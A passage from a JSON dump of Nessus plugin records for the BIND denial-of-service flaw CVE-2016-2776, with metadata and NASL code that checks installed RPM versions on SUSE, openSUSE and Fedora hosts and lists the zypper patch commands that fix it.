service\nvulnerability, where a crafted packet could cause the nameserver to\nabort. (CVE-2016-2776, bsc#1000362)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 34, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-28T00:00:00", "title": "SUSE SLES11 Security Update : bind (SUSE-SU-2016:2405-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-09-28T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:bind-devel", "p-cpe:/a:novell:suse_linux:bind-chrootenv", "p-cpe:/a:novell:suse_linux:bind", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:bind-doc", "p-cpe:/a:novell:suse_linux:bind-utils", "p-cpe:/a:novell:suse_linux:bind-libs"], "id": "SUSE_SU-2016-2405-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93772", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2405-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93772);\n script_version(\"2.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"SUSE SLES11 Security Update : bind (SUSE-SU-2016:2405-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The nameserver bind was updated to fix a remote denial of service\nvulnerability, where a crafted packet could cause the nameserver to\nabort. (CVE-2016-2776, bsc#1000362)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1000362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2016-2776/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162405-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c7d03875\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 5:zypper in -t patch sleclo50sp3-bind-12763=1\n\nSUSE Manager Proxy 2.1:zypper in -t patch slemap21-bind-12763=1\n\nSUSE Manager 2.1:zypper in -t patch sleman21-bind-12763=1\n\nSUSE Linux Enterprise Software Development Kit 11-SP4:zypper in -t\npatch sdksp4-bind-12763=1\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-bind-12763=1\n\nSUSE Linux Enterprise Server 11-SP3-LTSS:zypper in -t patch\nslessp3-bind-12763=1\n\nSUSE Linux Enterprise Server 11-SP2-LTSS:zypper in -t patch\nslessp2-bind-12763=1\n\nSUSE Linux Enterprise Point of Sale 11-SP3:zypper in -t patch\nsleposp3-bind-12763=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-bind-12763=1\n\nSUSE Linux Enterprise Debuginfo 11-SP3:zypper in -t patch\ndbgsp3-bind-12763=1\n\nSUSE Linux Enterprise Debuginfo 11-SP2:zypper in -t patch\ndbgsp2-bind-12763=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(2|3|4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP2/3/4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-chrootenv-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-doc-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-libs-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"bind-utils-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-chrootenv-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-doc-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-libs-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"3\", reference:\"bind-utils-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", cpu:\"s390x\", reference:\"bind-libs-32bit-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-chrootenv-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-devel-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-doc-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-libs-9.9.6P1-0.30.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:\"2\", reference:\"bind-utils-9.9.6P1-0.30.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-20T12:29:15", "description": "The nameserver bind was updated to fix a remote denial of service\nvulnerability, where a crafted packet could cause the nameserver to\nabort. (CVE-2016-2776, bsc#1000362) This update was imported from the\nSUSE:SLE-12-SP1:Update update project.", "edition": 23, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-09-28T00:00:00", "title": "openSUSE Security Update : bind (openSUSE-2016-1133)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-09-28T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bind-debugsource", "p-cpe:/a:novell:opensuse:bind-chrootenv", "p-cpe:/a:novell:opensuse:bind-utils", "p-cpe:/a:novell:opensuse:bind-debuginfo", "p-cpe:/a:novell:opensuse:bind-libs-debuginfo", "p-cpe:/a:novell:opensuse:bind-libs", "cpe:/o:novell:opensuse:42.1", "p-cpe:/a:novell:opensuse:bind-lwresd-debuginfo", "p-cpe:/a:novell:opensuse:bind-libs-32bit", "p-cpe:/a:novell:opensuse:bind-libs-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bind-lwresd", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:bind-devel", "p-cpe:/a:novell:opensuse:bind-utils-debuginfo", "p-cpe:/a:novell:opensuse:bind"], "id": "OPENSUSE-2016-1133.NASL", "href": "https://www.tenable.com/plugins/nessus/93782", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-1133.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93782);\n script_version(\"2.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"openSUSE Security Update : bind (openSUSE-2016-1133)\");\n script_summary(english:\"Check for the openSUSE-2016-1133 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The nameserver bind was updated to fix a remote denial of service\nvulnerability, where a crafted packet could cause the nameserver to\nabort. (CVE-2016-2776, bsc#1000362) This update was imported from the\nSUSE:SLE-12-SP1:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1000362\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected bind packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-chrootenv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-libs-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-lwresd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-lwresd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bind-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2|SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2 / 42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-chrootenv-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-debuginfo-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-debugsource-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-devel-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-libs-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-libs-debuginfo-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-lwresd-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-lwresd-debuginfo-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-utils-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bind-utils-debuginfo-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"bind-libs-debuginfo-32bit-9.9.6P1-2.22.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-chrootenv-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-debuginfo-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-debugsource-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-devel-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-libs-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-libs-debuginfo-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-lwresd-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-lwresd-debuginfo-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-utils-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"bind-utils-debuginfo-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"bind-libs-32bit-9.9.9P1-39.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", cpu:\"x86_64\", reference:\"bind-libs-debuginfo-32bit-9.9.9P1-39.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind / bind-chrootenv / bind-debuginfo / bind-debugsource / etc\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:14:49", "description": "Update to the latest upstream version due to CVE-2016-2776\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 21, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-10-06T00:00:00", "title": "Fedora 24 : bind99 (2016-cca77daf70)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-10-06T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:24", "p-cpe:/a:fedoraproject:fedora:bind99"], "id": "FEDORA_2016-CCA77DAF70.NASL", "href": "https://www.tenable.com/plugins/nessus/93888", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-cca77daf70.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93888);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"FEDORA\", value:\"2016-cca77daf70\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"Fedora 24 : bind99 (2016-cca77daf70)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to the latest upstream version due to CVE-2016-2776\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-cca77daf70\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected bind99 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bind99\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"bind99-9.9.9-2.P3.fc24\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bind99\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T10:14:24", "description": "Update to latest upstream version due to CVE-2016-2776\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 7.5, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"}, "published": "2016-11-15T00:00:00", "title": "Fedora 25 : 32:bind (2016-76bd94ca9e)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2776"], "modified": "2016-11-15T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:25", "p-cpe:/a:fedoraproject:fedora:32:bind"], "id": "FEDORA_2016-76BD94CA9E.NASL", "href": "https://www.tenable.com/plugins/nessus/94821", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-76bd94ca9e.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94821);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-2776\");\n script_xref(name:\"FEDORA\", value:\"2016-76bd94ca9e\");\n script_xref(name:\"IAVA\", value:\"2017-A-0004\");\n\n script_name(english:\"Fedora 25 : 32:bind (2016-76bd94ca9e)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream version due to CVE-2016-2776\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-76bd94ca9e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 32:bind package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:32:bind\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/11/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) 